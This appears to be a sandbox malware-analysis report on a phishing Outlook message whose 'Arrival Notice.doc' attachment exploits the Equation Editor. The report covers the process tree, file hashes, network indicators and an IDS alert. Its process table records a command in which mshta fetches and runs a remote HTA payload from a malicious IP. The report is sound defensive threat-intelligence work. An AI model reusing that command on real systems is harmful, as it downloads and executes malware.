File name: | Administrator Notification_ Redirecting email with malware.msg |
Full analysis: | https://app.any.run/tasks/2329cdad-3d6a-4880-a14a-adc51de667f2 |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 13:05:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 0EFA49A6627F75AB47CE3187EC320760 |
SHA1: | 7EA07F321D970558F3FFE5AED5B08131289E31CE |
SHA256: | D5C9840979222286AD94DDA2F052F498AA536C60513191F9A186DEDF6CE10E83 |
SSDEEP: | 3072:frcGXutin1rgwrrO6p/9fCKAvWkKpQ2LbPx9+gIJoWPc:H1cwnjOvWkKi2LN4Kh |
.msg | | | Outlook Message (58.9) |
---|---|---|
.oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2792 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
2516 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Exit code: 0 Version: 14.0.6025.1000 | ||||
2336 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2816 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3124 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3920 | MsHTa http://103.207.38.8:1010/hta &AAAAAAAAC | C:\Windows\system32\MsHTa.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR4B8D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF91A56A699FC54027.TMP | — | |
MD5:— | SHA256:— | |||
2516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRA805.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB795.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2336 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\1C05E995.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2816 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\msoC476.tmp | — | |
MD5:— | SHA256:— | |||
2816 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\~WRS{8E647E7B-B2A1-4EF9-82FB-FEAB71EB8FC5}.tmp | — | |
MD5:— | SHA256:— | |||
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:085133BDF7ACA5C88C899D8859FE23AC | SHA256:AE9808F0B4ECBEFED1A284B36BA1F87F0C127C92B7D9F1C7523C33CA8F11EB12 | |||
2792 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doc | text | |
MD5:FEEAB7C41B73D8F03B3D4D005A8B8BF3 | SHA256:1AE650453A47CBF7872860245C7FEFF1DC7F82E9AFC0AE9D431B66CA6F324ADE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3920 | MsHTa.exe | GET | — | 103.207.38.8:1010 | http://103.207.38.8:1010/hta | VN | — | — | malicious |
2792 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3920 | MsHTa.exe | 103.207.38.8:1010 | — | VNPT Corp | VN | malicious |
2792 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3920 | MsHTa.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |